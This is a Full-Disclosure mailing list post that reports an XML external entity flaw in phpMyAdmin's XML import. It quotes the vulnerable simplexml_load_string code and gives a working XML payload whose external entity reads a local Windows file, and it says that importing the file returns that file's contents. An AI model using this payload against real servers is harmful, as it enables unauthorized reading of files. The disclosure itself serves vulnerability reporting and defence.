PhpMyAdmin Arbitrary File Reading

[WooYun <root () wooyun org>]

Hi

80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network

in libraries/import/xml.php,some code like this


/**

 * Load the XML string

 *

 * The option LIBXML_COMPACT is specified because it can

 * result in increased performance without the need to

 * alter the code in any way. It's basically a freebee.

 */

$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);

unset($buffer);



/**

 * The XML was malformed

 */

if ($xml === FALSE) {

so you just need to make a xml like this

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>



<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/";>

    <!--

    - Structure schemas

    -->

    <pma:structure_schemas>

        <pma:database name="test" collation="utf8_general_ci"
charset="utf8">

            <pma:table name="ts_ad">

                &hi80sec;

            </pma:table>

        </pma:database>

    </pma:structure_schemas>



    <!--

    - 数据库: 'thinksns'

    -->

    <database name="thinksns">

        <!-- 表 ts_ad -->

    </database>

</pma_xml_export>

then import this xml in PhpMyAdmin,you will get the content you want.

From:http://www.wooyun.org/bugs/wooyun-2010-03185

:)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/